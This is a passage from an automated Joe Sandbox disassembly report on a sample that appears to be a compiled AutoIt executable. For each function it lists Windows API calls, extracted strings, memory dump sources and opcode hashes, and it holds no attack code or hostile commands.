                      • Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: fba57f513c91e5ad8897af9f38c56cc155bb061e36753374657b1950504babc6
                    • Instruction ID: d70a31184aa125afcea42fed1d65840b672301d92c326ea93feccea1415e22e0
                    • Opcode Fuzzy Hash: fba57f513c91e5ad8897af9f38c56cc155bb061e36753374657b1950504babc6
                    • Instruction Fuzzy Hash: 6171AC71140309AFD720CF28DC49F6A7BE6FB88309F08852DF985972A0D779E916DB16
                    APIs
                      • Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623
                    • DragQueryPoint.SHELL32(?,?), ref: 007CC917
                      • Part of subcall function 007CADF1: ClientToScreen.USER32(?,?), ref: 007CAE1A
                      • Part of subcall function 007CADF1: GetWindowRect.USER32(?,?), ref: 007CAE90
                      • Part of subcall function 007CADF1: PtInRect.USER32(?,?,007CC304), ref: 007CAEA0
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007CC980
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007CC98B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007CC9AE
                    • _wcscat.LIBCMT ref: 007CC9DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007CC9F5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007CCA0E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 007CCA25
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 007CCA47
                    • DragFinish.SHELL32(?), ref: 007CCA4E
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007CCB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 169749273-3440237614
                    • Opcode ID: e0f908fed817b98e33703faa583475ec760d2229b6879dac15947fa8a8a87489
                    • Instruction ID: c20aa165e2335d2cc2c9985b91453ec382dfe5385a3970240739f774ae1b15a7
                    • Opcode Fuzzy Hash: e0f908fed817b98e33703faa583475ec760d2229b6879dac15947fa8a8a87489
                    • Instruction Fuzzy Hash: 6F615C71108305AFC701DF64CC89EAFBBE9FF88750F004A2DF695962A1DB749A49CB52
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007C46AB
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007C46F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: d154fca3900683635895467124eca32378834e353c87f5de4b9319c5d800198d
                    • Instruction ID: dcfacddd933740f74c12798d8edd21e426c6d5ef5e95800f0bef4863e7d7de4f
                    • Opcode Fuzzy Hash: d154fca3900683635895467124eca32378834e353c87f5de4b9319c5d800198d
                    • Instruction Fuzzy Hash: 64915A34204705DFCB14EF20C465A6AB7A5AF95314F04896CF9966B3A2CB38ED4ACB81
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007CBB6E
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,007C6D80,?), ref: 007CBBCA
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CBC03
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007CBC46
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CBC7D
                    • FreeLibrary.KERNEL32(?), ref: 007CBC89
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007CBC99
                    • DestroyIcon.USER32(?), ref: 007CBCA8
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007CBCC5
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007CBCD1
                      • Part of subcall function 0076313D: __wcsicmp_l.LIBCMT ref: 007631C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 1212759294-1154884017
                    • Opcode ID: 664bf000aad649a5b19d0337a2b2ca517abaa9b29967fc62b331af19fdea931b
                    • Instruction ID: 20c3cd5758455b754003de0303091a0e2871c3f1284e25ae68ecb2e3b2d66946
                    • Opcode Fuzzy Hash: 664bf000aad649a5b19d0337a2b2ca517abaa9b29967fc62b331af19fdea931b
                    • Instruction Fuzzy Hash: E661B1B1A00619FAEB24DF64CC86FBE77A8EB08710F10811DF915D61D1DB79AD50DB60
                    APIs
                    • LoadStringW.USER32(00000066,?,00000FFF,007CFB78), ref: 007AA0FC
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 007AA11E
                    • __swprintf.LIBCMT ref: 007AA177
                    • __swprintf.LIBCMT ref: 007AA190
                    • _wprintf.LIBCMT ref: 007AA246
                    • _wprintf.LIBCMT ref: 007AA264
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf$_memmove
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%}
                    • API String ID: 311963372-1266152252
                    • Opcode ID: 3c68802324ca4e802bd299f6c46956ba739a56f6f5e101e41ff007128f42fed3
                    • Instruction ID: b8e0065db80f44e4ced5db2dfc6a206bb3709a67104138fb0442b6e0989fab10
                    • Opcode Fuzzy Hash: 3c68802324ca4e802bd299f6c46956ba739a56f6f5e101e41ff007128f42fed3
                    • Instruction Fuzzy Hash: EA518E71900119FBCF15EBA0CD8AEEEB779AF44300F104265F505721A2EB396F69CB61
                    APIs
                      • Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
                      • Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C
                    • CharLowerBuffW.USER32(?,?), ref: 007AA636
                    • GetDriveTypeW.KERNEL32 ref: 007AA683
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007AA6CB
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007AA702
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007AA730
                      • Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 29dcf27acc00138dfdbba9a2caa4f7d115c17e22b2fdd3eceb9fac35e1576151
                    • Instruction ID: 5ac70c8b711f41ef24f18bef3dfc8435f511c0080af3b0020414c2fec469b856
                    • Opcode Fuzzy Hash: 29dcf27acc00138dfdbba9a2caa4f7d115c17e22b2fdd3eceb9fac35e1576151
                    • Instruction Fuzzy Hash: B9513CB1104305EFC704EF20C88586AB7F4FF94718F04896DF89A97261DB39AE0ACB52
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007AA47A
                    • __swprintf.LIBCMT ref: 007AA49C
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 007AA4D9
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007AA4FE
                    • _memset.LIBCMT ref: 007AA51D
                    • _wcsncpy.LIBCMT ref: 007AA559
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007AA58E
                    • CloseHandle.KERNEL32(00000000), ref: 007AA599
                    • RemoveDirectoryW.KERNEL32(?), ref: 007AA5A2
                    • CloseHandle.KERNEL32(00000000), ref: 007AA5AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: 92169a41b276066306ad20ff20aad3d4cdbc84f89670308606e95bdd177fb03a
                    • Instruction ID: 6e6f0090090870e633fea5456daa4d964f66a9edacec994e96ed33a493b22964
                    • Opcode Fuzzy Hash: 92169a41b276066306ad20ff20aad3d4cdbc84f89670308606e95bdd177fb03a
                    • Instruction Fuzzy Hash: 9031B0B1900249BBDB219FA0DC48FEB37BDEF89701F1041BAF909D2160E7789654CB29
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                    • String ID:
                    • API String ID: 884005220-0
                    • Opcode ID: 27f8d54c771882834f85b4b4cb0436d193ced34ed21efeb887d21db3fdf8d7ae
                    • Instruction ID: 6ebb50a1a39d3efa87e4aa8e4b4ed2530c17dbea9147755d27f6e150f7ef483e
                    • Opcode Fuzzy Hash: 27f8d54c771882834f85b4b4cb0436d193ced34ed21efeb887d21db3fdf8d7ae
                    • Instruction Fuzzy Hash: 7F61E2B2900305FFFF215F64D845B6D77A9EB953A1F248215E8099B1A1DB3C8840C6A2
                    APIs
                      • Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007CC4EC
                    • GetFocus.USER32 ref: 007CC4FC
                    • GetDlgCtrlID.USER32(00000000), ref: 007CC507
                    • _memset.LIBCMT ref: 007CC632
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007CC65D
                    • GetMenuItemCount.USER32(?), ref: 007CC67D
                    • GetMenuItemID.USER32(?,00000000), ref: 007CC690
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007CC6C4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007CC70C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007CC744
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007CC779
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: 11c99b8bd94162ecad4dc0b028476f4002fbaef36340c320250f878df8baf856
                    • Instruction ID: a32bcbf5bf5f48fa4d13c2b4b08156be44fd66e2b976ae3dec642cfc8f3d8db4
                    • Opcode Fuzzy Hash: 11c99b8bd94162ecad4dc0b028476f4002fbaef36340c320250f878df8baf856
                    • Instruction Fuzzy Hash: ED816A702083019FDB12CF24D985F6BBBE9FB88314F14452DF999A7291D738D915CBA2
                    APIs
                      • Part of subcall function 0079874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00798766
                      • Part of subcall function 0079874A: GetLastError.KERNEL32(?,0079822A,?,?,?), ref: 00798770
                      • Part of subcall function 0079874A: GetProcessHeap.KERNEL32(00000008,?,?,0079822A,?,?,?), ref: 0079877F
                      • Part of subcall function 0079874A: HeapAlloc.KERNEL32(00000000,?,0079822A,?,?,?), ref: 00798786
                      • Part of subcall function 0079874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0079879D
                      • Part of subcall function 007987E7: GetProcessHeap.KERNEL32(00000008,00798240,00000000,00000000,?,00798240,?), ref: 007987F3
                      • Part of subcall function 007987E7: HeapAlloc.KERNEL32(00000000,?,00798240,?), ref: 007987FA
                      • Part of subcall function 007987E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00798240,?), ref: 0079880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00798458
                    • _memset.LIBCMT ref: 0079846D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0079848C
                    • GetLengthSid.ADVAPI32(?), ref: 0079849D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 007984DA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007984F6
                    • GetLengthSid.ADVAPI32(?), ref: 00798513
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00798522
                    • HeapAlloc.KERNEL32(00000000), ref: 00798529
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0079854A
                    • CopySid.ADVAPI32(00000000), ref: 00798551
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00798582
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007985A8
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007985BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: a9f36d6475c36cc15003cb3d460f27aff23674161285ae0675cb9b331e3e61ad
                    • Instruction ID: 4def944dc2fe2ba9387b1f195cdccf7d39fd91c21e7934bcc4fcaa5f6495b3db
                    • Opcode Fuzzy Hash: a9f36d6475c36cc15003cb3d460f27aff23674161285ae0675cb9b331e3e61ad
                    • Instruction Fuzzy Hash: 7861387190020AEFDF00DFA4EC45EAEBBB9FF05700F14816AE815A7291DB399A15CF61
                    APIs
                    • GetDC.USER32(00000000), ref: 007B76A2
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007B76AE
                    • CreateCompatibleDC.GDI32(?), ref: 007B76BA
                    • SelectObject.GDI32(00000000,?), ref: 007B76C7
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007B771B
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007B7757
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007B777B
                    • SelectObject.GDI32(00000006,?), ref: 007B7783
                    • DeleteObject.GDI32(?), ref: 007B778C
                    • DeleteDC.GDI32(00000006), ref: 007B7793
                    • ReleaseDC.USER32(00000000,?), ref: 007B779E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: b8d53c7c9473f9b07fb6fcf3291edb37a4151a56016eeb16b31d90b2cf81dc51
                    • Instruction ID: b73521040524e9340f116d669535e02ca5bf0def4f8a4e135ba236c54f804d64
                    • Opcode Fuzzy Hash: b8d53c7c9473f9b07fb6fcf3291edb37a4151a56016eeb16b31d90b2cf81dc51
                    • Instruction Fuzzy Hash: C5513875904209EFCB15CFA8CC89EAEBBB9EF48710F14852DF94AA7210D735A940CB64
                    APIs
                      • Part of subcall function 00760B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00746C6C,?,00008000), ref: 00760BB7
                      • Part of subcall function 007448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007448A1,?,?,007437C0,?), ref: 007448CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00746D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00746E5A
                      • Part of subcall function 007459CD: _wcscpy.LIBCMT ref: 00745A05
                      • Part of subcall function 0076387D: _iswctype.LIBCMT ref: 00763885
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 1febeee8110da462eae81d87a1a30c28908b1e67065f0488b4eda88957f8cfcf
                    • Instruction ID: e2a4ce778468778995d42e2ff8084cb1d6e091eed5549bce12de51cfc45a93ec
                    • Opcode Fuzzy Hash: 1febeee8110da462eae81d87a1a30c28908b1e67065f0488b4eda88957f8cfcf
                    • Instruction Fuzzy Hash: 1F026B71108341DFCB14EF24C885AAFBBE5BF99354F04891DF48A972A2DB38D949CB52
                    APIs
                    • _memset.LIBCMT ref: 007445F9
                    • GetMenuItemCount.USER32(00806890), ref: 0077D7CD
                    • GetMenuItemCount.USER32(00806890), ref: 0077D87D
                    • GetCursorPos.USER32(?), ref: 0077D8C1
                    • SetForegroundWindow.USER32(00000000), ref: 0077D8CA
                    • TrackPopupMenuEx.USER32(00806890,00000000,?,00000000,00000000,00000000), ref: 0077D8DD
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0077D8E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
